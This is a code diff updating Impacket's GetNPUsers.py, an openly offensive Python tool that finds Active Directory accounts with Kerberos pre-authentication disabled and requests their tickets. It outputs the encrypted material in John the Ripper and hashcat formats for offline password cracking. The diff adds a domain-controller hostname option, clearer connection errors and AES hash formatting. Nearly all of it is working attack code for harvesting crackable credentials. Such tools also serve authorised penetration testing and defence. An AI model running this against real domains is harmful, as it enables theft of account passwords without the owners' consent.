@@ -1,7 +1,7 @@
 #!/usr/bin/python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+# Copyright (C) 2023 Fortra. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -45,7 +45,8 @@ from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, s
 from impacket.krb5.kerberosv5 import sendReceive, KerberosError
 from impacket.krb5.types import KerberosTime, Principal
 from impacket.ldap import ldap, ldapasn1
-from impacket.smbconnection import SMBConnection
+from impacket.smbconnection import SMBConnection, SessionError
+
 
 class GetUserNoPreAuth:
     @staticmethod
@@ -69,6 +70,7 @@ class GetUserNoPreAuth:
         self.__username = username
         self.__password = password
         self.__domain = domain
+        self.__target = None
         self.__lmhash = ''
         self.__nthash = ''
         self.__no_pass = cmdLineOptions.no_pass
@@ -78,7 +80,9 @@ class GetUserNoPreAuth:
         self.__aesKey = cmdLineOptions.aesKey
         self.__doKerberos = cmdLineOptions.k
         self.__requestTGT = cmdLineOptions.request
-        self.__kdcHost = cmdLineOptions.dc_ip
+        #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost
+        self.__kdcIP = cmdLineOptions.dc_ip
+        self.__kdcHost = cmdLineOptions.dc_host
         if cmdLineOptions.hashes is not None:
             self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
 
@@ -90,16 +94,25 @@ class GetUserNoPreAuth:
         # Remove last ','
         self.baseDN = self.baseDN[:-1]
 
-    def getMachineName(self):
-        if self.__kdcHost is not None:
-            s = SMBConnection(self.__kdcHost, self.__kdcHost)
-        else:
-            s = SMBConnection(self.__domain, self.__domain)
+    def getMachineName(self, target):
         try:
+            s = SMBConnection(target, target)
             s.login('', '')
+        except OSError as e:
+            if str(e).find('timed out') > 0:
+                raise Exception('The connection is timed out. Probably 445/TCP port is closed. Try to specify '
+                                'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
+            else:
+                raise
+        except SessionError as e:
+            if str(e).find('STATUS_NOT_SUPPORTED') > 0:
+                raise Exception('The SMB request is not supported. Probably NTLM is disabled. Try to specify '
+                                'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
+            else:
+                raise
         except Exception:
             if s.getServerName() == '':
-                raise Exception('Error while anonymous logging into %s')
+                raise Exception('Error while anonymous logging into %s' % target)
         else:
             s.logoff()
         return s.getServerName()
@@ -159,7 +172,7 @@ class GetUserNoPreAuth:
         message = encoder.encode(asReq)
 
         try:
-            r = sendReceive(message, domain, self.__kdcHost)
+            r = sendReceive(message, domain, self.__kdcIP)
         except KerberosError as e:
             if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                 # RC4 not available, OK, let's ask for newer types
@@ -167,7 +180,7 @@ class GetUserNoPreAuth:
                                     int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
                 seq_set_iter(reqBody, 'etype', supportedCiphers)
                 message = encoder.encode(asReq)
-                r = sendReceive(message, domain, self.__kdcHost)
+                r = sendReceive(message, domain, self.__kdcIP)
             else:
                 raise e
 
@@ -182,22 +195,36 @@ class GetUserNoPreAuth:
             # The user doesn't have UF_DONT_REQUIRE_PREAUTH set
             raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
 
+        # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
         if self.__outputFormat == 'john':
-            # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
-            return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
-                                               hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
-                                               hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
-        else:
-            # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
-            return '$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
+            # Check what type of encryption is used for the enc-part data
+            # This will inform how the hash output needs to be formatted
+            if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
+                return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())
+            else:
+                return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
                                                    hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
                                                    hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
+        
+        # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
+        else:
+            # Check what type of encryption is used for the enc-part data
+            # This will inform how the hash output needs to be formatted
+            if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
+                return '$krb5asrep$%d$%s$%s$%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode(),
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode())
+            else:
+                return '$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
+                                                      hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
+                                                      hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
 
     @staticmethod
     def outputTGT(entry, fd=None):
-        if fd is None:
-            print(entry)
-        else:
+        print(entry)
+        if fd is not None:
             fd.write(entry + '\n')
 
     def run(self):
@@ -205,13 +232,17 @@ class GetUserNoPreAuth:
             self.request_users_file_TGTs()
             return
 
-        if self.__doKerberos:
-            target = self.getMachineName()
+        if self.__kdcHost is not None:
+            self.__target = self.__kdcHost
         else:
-            if self.__kdcHost is not None:
-                target = self.__kdcHost
+            if self.__kdcIP is not None:
+                self.__target = self.__kdcIP
             else:
-                target = self.__domain
+                self.__target = self.__domain
+
+            if self.__doKerberos:
+                logging.info('Getting machine hostname')
+                self.__target = self.getMachineName(self.__target)
 
         # Are we asked not to supply a password?
         if self.__doKerberos is False and self.__no_pass is True:
@@ -223,21 +254,21 @@ class GetUserNoPreAuth:
 
         # Connect to LDAP
         try:
-            ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.baseDN, self.__kdcHost)
+            ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)
             if self.__doKerberos is not True:
                 ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
             else:
                 ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
-                                             self.__aesKey, kdcHost=self.__kdcHost)
+                                             self.__aesKey, kdcHost=self.__kdcIP)
         except ldap.LDAPSessionError as e:
             if str(e).find('strongerAuthRequired') >= 0:
                 # We need to try SSL
-                ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.baseDN, self.__kdcHost)
+                ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcIP)
                 if self.__doKerberos is not True:
                     ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
                 else:
                     ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
-                                                 self.__aesKey, kdcHost=self.__kdcHost)
+                                                 self.__aesKey, kdcHost=self.__kdcIP)
             else:
                 # Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled)
                 logging.info('Cannot authenticate %s, getting its TGT' % self.__username)
@@ -265,6 +296,13 @@ class GetUserNoPreAuth:
                 resp = e.getAnswers()
                 pass
             else:
+                if str(e).find('NTLMAuthNegotiate') >= 0:
+                    logging.critical("NTLM negotiation failed. Probably NTLM is disabled. Try to use Kerberos "
+                                     "authentication instead.")
+                else:
+                    if self.__kdcIP is not None and self.__kdcHost is not None:
+                        logging.critical("If the credentials are valid, check the hostname and IP address of KDC. They "
+                                         "must match exactly each other")
                 raise
 
         answers = []
@@ -317,7 +355,6 @@ class GetUserNoPreAuth:
             print("No entries found!")
 
     def request_users_file_TGTs(self):
-
         with open(self.__usersFile) as fi:
             usernames = [line.strip() for line in fi]
 
@@ -346,9 +383,9 @@ if __name__ == '__main__':
     parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for users with "
                                   "'Do not require Kerberos preauthentication' set and export their TGTs for cracking")
 
-    parser.add_argument('target', action='store', help='domain/username[:password]')
+    parser.add_argument('target', action='store', help='[[domain/]username[:password]]')
     parser.add_argument('-request', action='store_true', default=False, help='Requests TGT for users and output them '
-                                                                             'in JtR/hashcat format (default False)')
+                                                                               'in JtR/hashcat format (default False)')
     parser.add_argument('-outputfile', action='store',
                         help='Output filename to write ciphers in JtR/hashcat format')
 
@@ -361,7 +398,6 @@ if __name__ == '__main__':
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
 
     group = parser.add_argument_group('authentication')
-
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
     group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
@@ -370,9 +406,14 @@ if __name__ == '__main__':
                                                        'line')
     group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                                                                             '(128 or 256 bits)')
-    group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
+
+    group = parser.add_argument_group('connection')
+    group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller. If '
                                                                               'ommited it use the domain part (FQDN) '
                                                                               'specified in the target parameter')
+    group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller to use. '
+                                                                              'If ommited, the domain part (FQDN) '
+                                                                              'specified in the account parameter will be used')
 
     if len(sys.argv)==1:
         parser.print_help()
@@ -388,7 +429,7 @@ if __name__ == '__main__':
         print("\n3. Request TGTs for all users")
         print("\n\tGetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily")
         print("\n4. Request TGTs for users in a file")
-        print("\n\tGetNPUsers.py contoso.com/ -no-pass -usersfile users.txt")
+        print("\n\tGetNPUsers.py -no-pass -usersfile users.txt contoso.com/")
         print("\nFor this operation you don\'t need credentials.")
         sys.exit(1)
 
